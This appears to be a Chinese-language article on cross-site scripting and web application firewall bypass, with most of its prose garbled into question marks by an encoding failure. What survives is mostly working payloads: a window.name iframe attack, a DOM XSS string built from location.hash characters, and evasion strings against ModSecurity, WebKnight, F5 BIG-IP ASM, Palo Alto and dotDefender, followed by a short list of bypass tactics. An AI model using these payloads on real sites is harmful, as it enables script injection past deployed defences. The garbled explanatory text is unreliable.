????Window.name???
??????????????iframe?????????棬???????????????????????????????javascript????
????POC
????<iframesrc=&#039;http://www.target.com?foo="xss  autofocus/AAAAA  onfocus=location=window.name//&#039;
????name="javascript:alert("XSS")"></iframe>
????DOM??XSS
??????????????????DOM???XSS?????DOM??XSS????????????У???????????
????<script>
????vari=location.hash;
????document.write(i);
????</script>
???????Щ????£???????XSS?????????DOM??XSS??
????http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()
?????????POC???[.+??????????????????????????location.hash????κβ?????????
????Location.hash[1] = :  // Defined at the first position after     the hash.
????Location.hash[2]= (  // Defined at the second position after     the has
????Location.hash[3] = ) // Defined     at third position after the hash.
????????п???????????????
???????
????ModSecurity???
????<scri%00pt>confirm(0);</scri%00pt>
????<a/onmouseover[x0b]=location=&#039;x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x30x29x3B&#039;>rhainfosec
?????ο?http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
????WEB KNIGHT???
????<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
????<marquee/onstart=confirm(2)>
????F5 BIG IP ASM and Palo ALTO???
????<table background="javascript:alert(1)"></table> //IE6?????汾Opera
????“/><marquee  onfinish=confirm(123)>a</marquee>
????Dot Defender???
????<svg/onload=prompt(1);>
????<isindex action="javas&tab;cript:alert(1)" type=image>
????<marquee/onstart=confirm(2)>
????????
??????????????????????????????????????????Ч?????????WAF???????????????????£?
????1?????????????????WAF??????????????????????????????????????????????????????
????2???????WAF????????£?
????3??WAF???????ò???????????????????????ò???content-length??С?????content-type???????????????и澯??
????4?????WAF????????????????????????????????BUG???????????????????????